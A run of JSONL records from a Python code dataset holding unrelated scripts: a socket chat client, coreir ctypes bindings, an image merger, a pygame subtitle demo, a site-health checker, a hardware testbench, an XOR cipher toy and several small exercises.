self.fake_A, self.rec_B]\n self.labels = ['real_A', 'fake_B', 'rec_A', 'real_B', 'fake_A', 'rec_B']\n images = [util().tensor2im(v.data) for v in self.visuals]\n return OrderedDict(zip(self.labels, images))\n\n def save(self, label):\n self.save_network(self.netG, 'G', label, self.gpu_ids)\n self.save_network(self.netD, 'D', label, self.gpu_ids)\n\n def get_domain(self):\n return self.DA\n\n def update_hyperparams(self, curr_iter):\n if curr_iter > self.opt.niter:\n decay_frac = (curr_iter - self.opt.niter) / self.opt.niter_decay\n new_lr = self.opt.lr * (1 - decay_frac)\n self.netG.update_lr(new_lr)\n self.netD.update_lr(new_lr)\n print('updated learning rate: %f' % new_lr)\n\n if self.opt.lambda_latent > 0:\n decay_frac = curr_iter / (self.opt.niter + self.opt.niter_decay)\n self.lambda_latent = self.opt.lambda_latent * decay_frac\n print(\"latent: \", self.lambda_latent)\n\n if self.opt.lambda_triplet > 0:\n decay_frac = curr_iter / (self.opt.niter + self.opt.niter_decay)\n self.lambda_triplet = self.opt.lambda_triplet * decay_frac\n print(\"triplet_feature: \", self.lambda_triplet)\n\n if self.opt.lambda_sam > 0:\n decay_frac = curr_iter / (self.opt.niter + self.opt.niter_decay)\n self.lambda_sam = self.opt.lambda_sam * decay_frac\n print(\"SAM: \", self.lambda_sam)\n","sub_path":"models/disam_model.py","file_name":"disam_model.py","file_ext":"py","file_size_in_byte":44471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275268386","text":"from Socket import Socket\nfrom threading import Thread\nimport os\n\n\nclass Client(Socket):\n def __init__(self):\n super(Client, self).__init__()\n self.nickname = None\n self.status = 0\n self.mychannels = ['Channel1', 'Channel2', 'Channel3']\n\n def set_up(self):\n self.connect(('127.0.0.1', 1234))\n\n self.check_nickname()\n\n self.check_channel()\n\n listen_thread = Thread(target=self.listen_server)\n listen_thread.start()\n\n send_thread = Thread(target=self.send_data, args=(None, None, None,))\n send_thread.start()\n\n def listen_server(self, listened_socket=None):\n while True:\n input_nickname = self.recv(254)\n data = self.recv(254)\n\n if data.decode('utf-8') == '/quit':\n print('\\r', end='')\n os.system(\"cls\")\n\n self.check_channel()\n\n self.status = 0\n\n elif input_nickname.decode('utf-8') != self.nickname:\n print('\\r', end='')\n print(f'{input_nickname.decode(\"utf-8\")}: {data.decode(\"utf-8\")} \\n{self.nickname}: ', end='')\n\n def send_data(self, nickname, channel, data):\n while True:\n if self.status == 0:\n _input = input(self.nickname + ': ')\n self.send(_input.encode('utf-8'))\n if _input == '/quit':\n self.status = 1\n\n def check_nickname(self):\n while True:\n self.nickname = input('Enter your nickname: ')\n if len(self.nickname) > 3:\n self.send(self.nickname.encode('utf-8'))\n status = self.recv(254)\n if status.decode('utf-8') == 'OK':\n break\n print('Error: such name already exists')\n else:\n print('Error: length of name < 3')\n\n def print_list_channels(self):\n print('Your Channels:')\n for channel in self.mychannels:\n print(' ' + channel)\n print('')\n\n def check_channel(self):\n\n self.print_list_channels()\n\n while True:\n\n _input = input('Enter channel: ')\n if len(_input) == 0:\n continue\n\n self.send(_input.encode('utf-8'))\n status = self.recv(254)\n if status.decode('utf-8') == 'wrong channel':\n print('Error: nonexistent channel')\n\n elif status.decode('utf-8') == 'OK':\n print('KO')\n pass\n\n else:\n print(status.decode('utf-8'))\n self.send(input('Answer: ').encode('utf-8'))\n status = self.recv(254)\n if status.decode('utf-8') == 'OK':\n self.mychannels.append(_input)\n\n if status.decode('utf-8') == 'OK':\n self.send('OK'.encode('utf-8'))\n\n os.system(\"cls\")\n\n message = self.recv(330000).decode('utf-8').split('|')\n\n for line in message:\n print(line)\n break\n\n\nif __name__ == '__main__':\n client = Client()\n client.set_up()\n","sub_path":"Baranov_Vladislav/Messenger/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162149542","text":"def main():\n N = int(input())\n S = list(input())\n K = int(input())\n\n k_str = S[K-1]\n for i in range(len(S)):\n if S[i] != k_str:\n S[i] = '*'\n\n print(''.join(S))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tenka1_beginner_2019/tenka1-b.py","file_name":"tenka1-b.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106448166","text":"from ctypes import cdll\nimport ctypes as ct\nimport platform\nimport os\nfrom coreir.lib import load_shared_lib, libcoreir_c\nfrom coreir.context import COREContext, COREContext_p, Context, COREMapKind, COREMapKind_STR2ARG_MAP, COREMapKind_STR2PARAM_MAP, COREMapKind_STR2ARG_MAP\nfrom coreir.module import COREModule, COREModule_p, COREModuleDef, COREModuleDef_p, ModuleDef, Module, \\\n COREDirectedInstance_p, COREDirectedConnection_p, COREDirectedModule_p\nfrom coreir.namespace import CORENamespace, CORENamespace_p\nfrom coreir.type import COREType, COREType_p, CoreIRType, Params, Args, COREArg, COREArg_p, Type\nfrom coreir.wireable import COREWireable_p\nfrom collections import namedtuple\n\nclass COREConnection(ct.Structure):\n pass\n\nCOREConnection_p = ct.POINTER(COREConnection)\n\nlibcoreir_c.CORENewMap.argtypes = [COREContext_p, ct.c_void_p, ct.c_void_p, ct.c_uint32, COREMapKind]\nlibcoreir_c.CORENewMap.restype = ct.c_void_p\n\nlibcoreir_c.CORENewContext.restype = COREContext_p\n\nlibcoreir_c.COREPrintErrors.argtypes = [COREContext_p]\n\nlibcoreir_c.COREAny.argtypes = [COREContext_p]\nlibcoreir_c.COREAny.restype = COREType_p\n\nlibcoreir_c.COREBitIn.argtypes = [COREContext_p]\nlibcoreir_c.COREBitIn.restype = COREType_p\n\nlibcoreir_c.COREBit.argtypes = [COREContext_p]\nlibcoreir_c.COREBit.restype = COREType_p\n\nlibcoreir_c.COREArray.argtypes = [COREContext_p, ct.c_uint32, COREType_p]\nlibcoreir_c.COREArray.restype = COREType_p\n\nlibcoreir_c.CORERecord.argtypes = [COREContext_p, ct.c_void_p]\nlibcoreir_c.CORERecord.restype = COREType_p\n\nlibcoreir_c.COREPrintType.argtypes = [COREType_p, ]\n\nlibcoreir_c.CORELoadModule.argtypes = [COREContext_p, ct.c_char_p, ct.POINTER(ct.c_bool)]\nlibcoreir_c.CORELoadModule.restype = COREModule_p\n\nlibcoreir_c.CORESaveModule.argtypes = [COREModule_p, ct.c_char_p, ct.POINTER(ct.c_bool)]\n\nlibcoreir_c.COREGetGlobal.argtypes = [COREContext_p]\nlibcoreir_c.COREGetGlobal.restype = CORENamespace_p\n\nlibcoreir_c.CORENewModule.argtypes = [CORENamespace_p, ct.c_char_p, COREType_p, ct.c_void_p]\nlibcoreir_c.CORENewModule.restype = COREModule_p\n\nlibcoreir_c.COREModuleSetDef.argtypes = [COREModule_p, COREModuleDef_p]\n\nlibcoreir_c.COREPrintModule.argtypes = [COREModule_p]\n\nlibcoreir_c.COREModuleNewDef.argtypes = [COREModule_p]\nlibcoreir_c.COREModuleNewDef.restype = COREModuleDef_p\n\nlibcoreir_c.COREModuleGetDef.argtypes = [COREModule_p]\nlibcoreir_c.COREModuleGetDef.restype = COREModuleDef_p\n\nlibcoreir_c.COREModuleDefAddModuleInstance.argtypes = [COREModuleDef_p, ct.c_char_p, COREModule_p, ct.c_void_p]\nlibcoreir_c.COREModuleDefAddModuleInstance.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefGetInterface.argtypes = [COREModuleDef_p]\nlibcoreir_c.COREModuleDefGetInterface.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefGetInstances.argtypes = [COREModuleDef_p, ct.POINTER(ct.c_uint)]\nlibcoreir_c.COREModuleDefGetInstances.restype = ct.POINTER(COREWireable_p)\n\nlibcoreir_c.COREModuleGetDirectedModule.argtypes = [COREModule_p]\nlibcoreir_c.COREModuleGetDirectedModule.restype = COREDirectedModule_p\n\nlibcoreir_c.COREGetInstRefName.argtypes = [COREWireable_p]\nlibcoreir_c.COREGetInstRefName.restype = ct.c_char_p\n\nlibcoreir_c.COREGetConfigValue.argtypes = [COREWireable_p,ct.c_char_p]\nlibcoreir_c.COREGetConfigValue.restype = COREArg_p;\n\nlibcoreir_c.COREGetArgKind.argtypes = [COREArg_p]\nlibcoreir_c.COREGetArgKind.restype = ct.c_int\n\nlibcoreir_c.COREArgStringGet.argtypes = [COREArg_p]\nlibcoreir_c.COREArgStringGet.restype = ct.c_char_p\n\nlibcoreir_c.COREArgIntGet.argtypes = [COREArg_p]\nlibcoreir_c.COREArgIntGet.restype = ct.c_int\n\nlibcoreir_c.COREArgInt.argtypes = [COREContext_p,ct.c_int]\nlibcoreir_c.COREArgInt.restype = COREArg_p\n\nlibcoreir_c.COREArgString.argtypes = [COREContext_p,ct.c_char_p]\nlibcoreir_c.COREArgString.restype = COREArg_p\n\nlibcoreir_c.COREModuleDefGetConnections.argtypes = [COREModuleDef_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREModuleDefGetConnections.restype = ct.POINTER(COREConnection_p)\n\nlibcoreir_c.COREConnectionGetFirst.argtypes = [COREConnection_p]\nlibcoreir_c.COREConnectionGetFirst.restype = COREWireable_p\n\nlibcoreir_c.COREConnectionGetSecond.argtypes = [COREConnection_p]\nlibcoreir_c.COREConnectionGetSecond.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefConnect.argtypes = [COREModuleDef_p, COREWireable_p, COREWireable_p]\n\nlibcoreir_c.COREPrintModuleDef.argtypes = [COREModuleDef_p]\n\nlibcoreir_c.COREWireableGetConnectedWireables.argtypes = [COREWireable_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREWireableGetConnectedWireables.restype = ct.POINTER(COREWireable_p)\n\nlibcoreir_c.COREWireableGetModuleDef.argtypes = [COREWireable_p]\nlibcoreir_c.COREWireableGetModuleDef.restype = COREModuleDef_p\n\nlibcoreir_c.COREWireableSelect.argtypes = [COREWireable_p, ct.c_char_p]\nlibcoreir_c.COREWireableSelect.restype = COREWireable_p\n\nlibcoreir_c.COREWireableGetSelectPath.argtypes = [COREWireable_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREWireableGetSelectPath.restype = ct.POINTER(ct.c_char_p)\n\nlibcoreir_c.COREWireableGetType.argtypes = [COREWireable_p]\nlibcoreir_c.COREWireableGetType.restype = COREType_p\n\nlibcoreir_c.COREModuleDefSelect.argtypes = [COREModuleDef_p, ct.c_char_p]\nlibcoreir_c.COREModuleDefSelect.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefGetModule.argtypes = [COREModuleDef_p]\nlibcoreir_c.COREModuleDefGetModule.restype = COREModule_p\n\nlibcoreir_c.CORENamespaceGetName.argtypes = [CORENamespace_p]\nlibcoreir_c.CORENamespaceGetName.restype = ct.c_char_p\n\n# libcoreir_c.CORESelectGetParent.argtypes = [COREWireable_p]\n# libcoreir_c.CORESelectGetParent.restype = COREWireable_p\n\nlibcoreir_c.COREDirectedModuleSel.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_char_p), ct.c_int]\nlibcoreir_c.COREDirectedModuleSel.restype = COREWireable_p\n\nlibcoreir_c.COREDirectedModuleGetInstances.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_uint)]\nlibcoreir_c.COREDirectedModuleGetInstances.restype = ct.POINTER(COREDirectedInstance_p)\n\nlibcoreir_c.COREDirectedModuleGetInputs.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedModuleGetInputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedModuleGetOutputs.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedModuleGetOutputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedModuleGetConnections.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedModuleGetConnections.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedConnectionGetSrc.argtypes = [COREDirectedConnection_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedConnectionGetSrc.restype = ct.POINTER(ct.c_char_p)\n\nlibcoreir_c.COREDirectedConnectionGetSnk.argtypes = [COREDirectedConnection_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedConnectionGetSnk.restype = ct.POINTER(ct.c_char_p)\n\nlibcoreir_c.COREDirectedInstanceGetInputs.argtypes = [COREDirectedInstance_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedInstanceGetInputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedInstanceGetOutputs.argtypes = [COREDirectedInstance_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedInstanceGetOutputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREArrayTypeGetLen.argtypes = [COREType_p]\nlibcoreir_c.COREArrayTypeGetLen.restype = ct.c_uint\n\nlibcoreir_c.COREGetTypeKind.argtypes = [COREType_p]\nlibcoreir_c.COREGetTypeKind.restype = ct.c_int # CORETypeKind is an enum\n\nlibcoreir_c.CORETypeGetSize.argtypes = [COREType_p]\nlibcoreir_c.CORETypeGetSize.restype = ct.c_uint\n\nlibcoreir_c.COREInstanceGetGenArgs.argtypes = [COREWireable_p, ct.POINTER(ct.POINTER(ct.c_char_p)), ct.POINTER(ct.POINTER(COREArg_p)), ct.POINTER(ct.c_int)]\nlibcoreir_c.COREInstanceGetGenArgs.restype = None\n","sub_path":"bindings/python/coreir/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138986913","text":"from PIL import Image\nfrom ImgResize import imgresize\nimport numpy as np\nimport os\nimport shutil\n\n\nbaseurl = r'C:\\Users\\jiangt6\\Downloads\\韩漫\\恋爱辅助器\\01-111-combine'\ndisturl = r'C:\\Users\\jiangt6\\Downloads\\韩漫\\恋爱辅助器\\01-111-dst'\nfiles = os.listdir(baseurl)\n\n\ndstcounter = 6000\n\nmaxjpgdim = 50000\ncurjpgdim = 0\n\nsectionstartfile = True\n\nfor file in files:\n\n if sectionstartfile:\n print('Base Image ' + file)\n baseimg = imgresize(Image.open(baseurl + os.sep + file))\n curjpgdim = baseimg.size[1]\n basemat = np.atleast_2d(baseimg)\n sectionstartfile = False\n else:\n print('Appending Image ' + file)\n appendimg = imgresize(Image.open(baseurl + os.sep + file))\n curjpgdim = curjpgdim + appendimg.size[1]\n appendmat = np.atleast_2d(appendimg)\n basemat = np.append(basemat, appendmat, axis=0)\n if curjpgdim > maxjpgdim:\n print('Current JPG Dim: ' + str(curjpgdim))\n report_img = Image.fromarray(basemat)\n report_img.save(disturl + os.sep + str(dstcounter) + '.jpg')\n print('Save Pic ' + str(dstcounter) + '.jpg')\n print('********************************************')\n print()\n dstcounter = dstcounter + 1\n sectionstartfile = True\n\nreport_img = Image.fromarray(basemat)\nreport_img.save(disturl + os.sep + str(dstcounter) + '.jpg')\nprint('Save Pic ' + str(dstcounter) + '.jpg')\ndstcounter = dstcounter + 1\n","sub_path":"Img Merge/ImgMerge.py","file_name":"ImgMerge.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"236132470","text":"# FB tag frequency top 100\n# Premium\n# https://leetcode.com/problems/buildings-with-an-ocean-view/\n# return buildings with an ocean view\n\n# O(n) time and space\nclass Solution:\n def findBuildings(self, heights: List[int]) -> List[int]:\n # last element always fulfils\n answer = [len(heights) - 1]\n \n max_height = 0\n for i in range(1, len(heights)):\n max_height = max(heights[-i], max_height)\n if heights[-i-1] > max_height:\n answer.append(len(heights) - i - 1)\n \n answer.reverse()\n return answer","sub_path":"leetcode/1762_BuildingsWithAnOceanView.py","file_name":"1762_BuildingsWithAnOceanView.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124193035","text":"import pygame\nfrom pygame.locals import *\nfrom sys import exit\nfrom random import randint\n\ntext1 = \"红艳艳的都市十分繁华\" # 剧情text\nred = 255, 0, 0\nblack = 0, 0, 0\nwhite = 255, 255, 255\nSPEED_FACTOR = 0.005 # 渐变色的速度\nfactor1 = 0\nticks = 0\nspeed_text = -2\npos_x1 = randint(25, 725) # 前剧情文本x坐标(最好定制)\npos_y1 = 490 # 前剧情文本y坐标(在界面下方)\n\nglobal_v_idx = 0\n\n\npygame.init() # 初始化pygame\npygame.font.init()\npygame.mixer.init()\npygame.time.delay(1000) # 初始化等待一秒\nwin_size = width, height = 1100, 500 # 设置窗口大小\nwin = pygame.display.set_mode(win_size) # 显示窗口\npygame.display.set_caption(\"夜已—测试版\") # 大标题title\n\nclock = pygame.time.Clock() # 创建游戏时钟\n\n\ndef drawText(contect, color=red, size=50): # 创建一个字的函数\n myfont = pygame.font.Font(\"Xingkai.ttc\", size) # 字体、大小\n textImage = myfont.render(contect, True, color)\n return textImage\n\ndef blend_color(color1=red, color2=black, blend_factor=0.5): # 渐变色的实现\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n r = r1 + (r2 - r1) * blend_factor\n g = g1 + (g2 - g1) * blend_factor\n b = b1 + (b2 - b1) * blend_factor\n return int(r), int(g), int(b)\n\ndef draw_subtitles(text, pos_x, pos_y, factor):\n ## global speed_text\n #if time1 <= tick <= time2:\n position = pos_x, pos_y\n pos_y += speed_text\n\n # win.blit(drawText(text, white), position)\n\n win.blit(drawText(text, blend_color(blend_factor=factor)), position)\n\n\ndef draw_from_arr(in_idx, tick):\n if 0 <= in_idx < len(text_arr):\n itemarr = text_arr[in_idx]\n txt = itemarr[0]\n tmp_posx = int(itemarr[1])\n\n tmp_posy = int(itemarr[2]) - 1\n text_arr[in_idx][2] = str(tmp_posy)\n\n tmp_factor = float(itemarr[3]) + SPEED_FACTOR\n if tmp_factor >= 1:\n tmp_factor = 1\n text_arr[in_idx][3] = str(tmp_factor)\n\n\n draw_subtitles(txt, tmp_posx, tmp_posy, tmp_factor) # 文本1\n\n\ntext_arr = []\nwith open(\"subtitles.txt\") as fdata:\n while True:\n line = fdata.readline()\n if not line:\n break\n if line.startswith(\"#\") == False:\n text_arr.append(line.split(\"|\"))\n for i in range(len(text_arr)):\n if int(text_arr[i][1]) == 0:\n text_arr[i][1] = str(randint(25,750))\n\n\nidx = 0\nprint(text_arr)\ncurr_txt = ''\n\nslow_tick = 0\n\nwhile True:\n win.fill(black) # 背景颜色bgcolor,位置放前以不至于遮挡\n\n clock.tick(150) # 每秒运行150次\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # 退出游戏\n pygame.quit()\n exit()\n\n tisks = pygame.time.get_ticks() # 游戏开始绝对时间\n tmp_tick = tisks\n idx = int(tmp_tick/3000) - 2\n\n if 0 <= idx < len(text_arr):\n if curr_txt != text_arr[idx][0]:\n curr_txt = text_arr[idx][0]\n print(\"idx=\",idx, \" 字幕为:\", curr_txt)\n\n draw_from_arr(idx - 4, tmp_tick)\n draw_from_arr(idx - 3, tmp_tick)\n draw_from_arr(idx - 2, tmp_tick)\n draw_from_arr(idx - 1, tmp_tick)\n draw_from_arr(idx, tmp_tick)\n\n pygame.display.update() # 更新全部显示\n","sub_path":"草稿.py","file_name":"草稿.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"580980101","text":"import tensorflow as tf\nfrom tensorflow.python.estimator import estimator\n\n\ndef bilstm_crf_fn(word_idx, label_idx, params, mode):\n word_vocab_size = params['word_vocab_size']\n word_emb_size = params['word_emb_size']\n lstm_hidden = params['lstim_hidden']\n\n word_emb = tf.get_variable('word_embeddings',\n [word_vocab_size, word_emb_size])\n lookuped_word_emb = tf.nn.embedding_lookup(word_emb, word_idx)\n\n fwd_lstm_cell = tf.contrib.rnn.LSTMCell(lstm_hidden)\n bwd_lstm_cell = tf.contrib.rnn.LSTMCell(lstm_hidden)\n\n (out_fw, out_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n fwd_lstm_cell,\n bwd_lstm_cell, word_emb, sequence_length=seq_lengths,\n dtype=tf.float32)\n\n context_rep = tf.concat([out_fw, out_bw], axis=-1)\n\n\n\n\n\n\nclass BiLSTMSeqLabelor(estimator.Estimator):\n def __init__(self, model_dir, params, config=None, warm_start_from=None):\n\n super(BiLSTMSeqLabelor, self).__init__(\n model_dir, params, config, warm_start_from\n )\n\n","sub_path":"inhousednn/task/sequence_labeling/BiLSTMSeqLabelor.py","file_name":"BiLSTMSeqLabelor.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99839800","text":"import argparse\nimport os\nimport requests\nimport whois\nfrom datetime import datetime\n\n\ndef load_urls4check(path):\n if not os.path.exists(path):\n return None\n with open(path) as f_urls:\n urls = f_urls.read().strip().split()\n return urls\n\n\ndef is_server_respond_with_200(url):\n try:\n return requests.get(url).status_code == 200\n except requests.exceptions.ConnectionError:\n return None\n except requests.exceptions.TooManyRedirects:\n return None\n\n\ndef is_domain_extended_enough(domain_name):\n days_in_month = 30\n query = whois.whois(domain_name)\n if not query.expiration_date:\n return None\n if type(query.expiration_date) == list:\n expiration_date = query.expiration_date[0]\n else:\n expiration_date = query.expiration_date\n if (expiration_date - datetime.now()).days <= days_in_month:\n return False\n return True\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filepath\", type=str, help=\"Path to file with URLs\")\n return parser.parse_args()\n\n\ndef get_test_results(urls):\n formatted_server_respond_domain_extend = [\"{} | {} | {}\".format(\n url, \"Good. Server is responding 200.\" if is_server_respond_with_200(url) else \"!SOMETHING WRONG!\",\n \"Domain extended enough.\" if is_domain_extended_enough(url) else \"!DOMAIN DOESN'T EXTENDED ENOUGH!\")\n for url in urls]\n return formatted_server_respond_domain_extend\n\nif __name__ == '__main__':\n args = arg_parser()\n urls = load_urls4check(args.filepath)\n if urls:\n test_results = get_test_results(urls)\n print(*test_results , sep=\"\\n\")\n else:\n print(\"Файла не существует\")\n","sub_path":"check_sites_health.py","file_name":"check_sites_health.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"469937652","text":"#!/usr/bin/env python3\n\"\"\"\nTestbench for the image_write module.\n\"\"\"\n\nfrom typing import Dict\n\nimport testbench as dut # type: ignore\n\n\ndef concat_cfg1(arg0: int) -> int:\n return (arg0 & 0xffffffff)\n\n\ndef concat_cfg2(arg1: int, arg0: int) -> int:\n shift_arg0 = (arg0 & 0x0000ffff)\n shift_arg1 = (arg1 & 0x0000ffff) << 16\n\n return (shift_arg1 | shift_arg0)\n\n\ndef concat_cfg4(arg3: int, arg2: int, arg1: int, arg0: int) -> int:\n shift_arg0 = (arg0 & 0x000000ff)\n shift_arg1 = (arg1 & 0x000000ff) << 8\n shift_arg2 = (arg2 & 0x000000ff) << 16\n shift_arg3 = (arg3 & 0x000000ff) << 24\n\n return (shift_arg3 | shift_arg2 | shift_arg1 | shift_arg0)\n\n\ndef setup():\n \"\"\" Set starting DUT values and reset module \"\"\"\n\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [0])\n dut.prep(\"cfg_valid\", [0])\n dut.prep(\"str_img_bus\", [0])\n dut.prep(\"str_img_val\", [0])\n dut.prep(\"image_rdy\", [0])\n\n # reset module\n dut.prep(\"rst\", [1])\n dut.tick()\n\n dut.prep(\"rst\", [0])\n for _ in range(2):\n dut.tick()\n\n\ndef config_write(start_addr: int, step_pixel: int, step_row: int,\n img: Dict[str, int], mem_select: int) -> None:\n \"\"\" send write configuration \"\"\"\n\n # CFG_IW_IMG_W\n dut.prep(\"cfg_data\", [(img['width']-1)])\n dut.prep(\"cfg_addr\", [9])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IW_START\n dut.prep(\"cfg_data\", [concat_cfg2(start_addr, (img['height']-1))])\n dut.prep(\"cfg_addr\", [10])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IW_STEP\n dut.prep(\"cfg_data\", [concat_cfg2((step_pixel-1), (step_row-1))])\n dut.prep(\"cfg_addr\", [11])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IMG_WR\n dut.prep(\"cfg_data\", [mem_select])\n dut.prep(\"cfg_addr\", [3])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [0])\n dut.prep(\"cfg_valid\", [0])\n for _ in range(3):\n dut.tick()\n\n\ndef config_read(img: Dict[str, int], pad: Dict[str, int],\n maxp_side: int, conv: Dict[str, int], mem_select: int) -> None:\n \"\"\" send read configuration \"\"\"\n\n # CFG_IR_IMG_W\n dut.prep(\"cfg_data\", [concat_cfg1(img['width']-1)])\n dut.prep(\"cfg_addr\", [5])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IR_IMG_DH\n dut.prep(\"cfg_data\", [concat_cfg2((img['depth']-1), (img['height']-1))])\n dut.prep(\"cfg_addr\", [6])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IR_PAD\n dut.prep(\"cfg_data\", [concat_cfg4(pad['left'], pad['right'],\n pad['top'], pad['bottom'])])\n dut.prep(\"cfg_addr\", [7])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IR_CONV\n dut.prep(\"cfg_data\", [concat_cfg4((maxp_side-1), (conv['side']-1),\n 0, (conv['step']-1))])\n dut.prep(\"cfg_addr\", [8])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IMG_RD\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [4])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [0])\n dut.prep(\"cfg_valid\", [0])\n for _ in range(3):\n dut.tick()\n\n\n# parameters\nparam = {}\nparam['CFG_DWIDTH'] = 32\nparam['CFG_AWIDTH'] = 5\nparam['STR_IMG_WIDTH'] = 64\nparam['GROUP_NB'] = 4\nparam['IMG_WIDTH'] = 16\nparam['DEPTH_NB'] = 16\nparam['MEM_AWIDTH'] = 16\n\n# cfg values\nimg_width = 10 # image width\nimg_height = 5 # image height\nimg_depth = 8 # image depth\n\nstart_addr = 0 # starting offset\nstep_pixel = 4 # distance to step to next pixel\nstep_row = 10 # distance to step to next row\n\npad_left = 1 # padding around left image\npad_right = 1 # padding around right image\npad_top = 1 # padding around top image\npad_bottom = 1 # padding around bottom image\n\nmaxp_side = 2 # maxp_side value of one will turn maxpooling off\nconv_side = 3 # square side of conv e.g. 3x3\nconv_step = 2 # distance to step for next conv volume\n\nwr_mem_select = 0 # select the image_write buffer to activate\nrd_mem_select = 0 # select the image_read buffer to activate\n\nstream_nb = int(img_width * img_height * step_pixel *\n (param['IMG_WIDTH'] * param['DEPTH_NB'] / param['STR_IMG_WIDTH']))\n\n\ndut.init()\n\nsetup()\n\nconfig_write(\n start_addr, step_pixel, step_row,\n {'width': img_width, 'height': img_height, 'depth': img_depth},\n wr_mem_select)\n\n\ncnt = 1\nfor _ in range(stream_nb):\n dut.prep(\"str_img_val\", [1])\n dut.prep(\"str_img_bus\", [cnt])\n\n io = dut.tick()\n\n if io['str_img_rdy'] == 1:\n # sample the rdy to see if the data has been moved into the pipeline,\n # if both rdy & val are high we increment to the 'next' data\n cnt = cnt + 1\n\ndut.prep(\"str_img_val\", [0])\ndut.prep(\"str_img_bus\", [0])\n\n\nconfig_read(\n {'width': img_width, 'height': img_height, 'depth': img_depth},\n {'left': pad_left, 'right': pad_right, 'top': pad_top, 'bottom': pad_bottom},\n maxp_side,\n {'side': conv_side, 'step': conv_step},\n rd_mem_select)\n\n\ndut.prep(\"image_rdy\", [1])\n\nio = dut.tick()\nwhile io['image_last'] == 0:\n io = dut.tick()\n\nfor _ in range(100):\n io = dut.tick()\n\n\ndut.finish()\n","sub_path":"dut/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"166305205","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\ndesc:\nauthor: huha\n'''\nclass xor:\n def __init__(self,key):\n self.key = key\n def en(self,a):\n enstr = bytearray()\n for x in range(len(a)):\n enstr.append(a[x]^self.key[x%len(self.key)])\n return enstr\n\n def de(self,enstr):\n a = bytearray()\n for x in range(len(enstr)):\n a.append(enstr[x] ^ self.key[x % len(self.key)])\n return a\n\n def enfile(self,file):\n a = file.read()\n with open(file.filename+'_en','wb') as f:\n f.write(self.en(a))\n\n def defile(self,file):\n enstr = file.read()\n with open(file.filename+'_de','wb') as f:\n f.write(self.en(enstr))\n\n\nif __name__ == '__main__':\n a = bytes('sdfadf','utf8')\n key = bytes('123_哈', 'utf8')\n xor = xor(key)\n enstr = xor.en(a)\n print(xor.de(enstr).decode())","sub_path":"Xor算法/flaskr/mimaxue.py","file_name":"mimaxue.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"587442336","text":"import re\n\ngrammar = \"\"\"\n S : + S S\n S : * S S\n S : ~ S\n S : 